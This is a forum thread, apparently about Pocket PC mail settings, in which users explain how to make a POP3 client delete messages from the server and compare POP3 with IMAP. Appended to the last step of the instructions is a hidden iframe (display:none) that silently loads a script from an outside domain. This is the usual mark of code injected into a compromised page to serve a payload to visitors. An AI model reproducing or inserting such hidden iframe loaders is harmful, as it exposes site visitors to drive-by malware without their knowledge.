+ Reply to Thread

Why doesn't my email get deleted from the server

The PPCPE checks email but can be kind of difficult to get it to delete the email from the server. Follow the steps below to check email and delete it from the server using the PPCPE:

1. Check and download headers (with 2k of message body).
    2. Do NOT disconnect
    3. Read, file and review all messages.
    4. Delete those I don't want.
    5. My trash is set to delete automatically once an email is deleted.
    6. press send/recv button again
    7. disconnect<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Smitty, is this for POP3?

It should be noted that the protocol used makes a big difference. I've found best success with IMAP, but that may just be what my servers like best. IMAP is a sync protocol which is supposed to do just this. However, the PPC mail client cannot handle non-standard IMAP folder configurations which apparently some servers use. If this happens it simply will not delete mail ever.

Originally posted by "SwampNut"

Smitty, is this for POP3?

It should be noted that the protocol used makes a big difference. I've found best success with IMAP, but that may just be what my servers like best. IMAP is a sync protocol which is supposed to do just this. However, the PPC mail client cannot handle non-standard IMAP folder configurations which apparently some servers use. If this happens it simply will not delete mail ever.
    yes, the above instructions relate to POP3 service not IMAP.

I would rather use IMAP but I have found that POP3 worked better for me due to the type of email server I manage.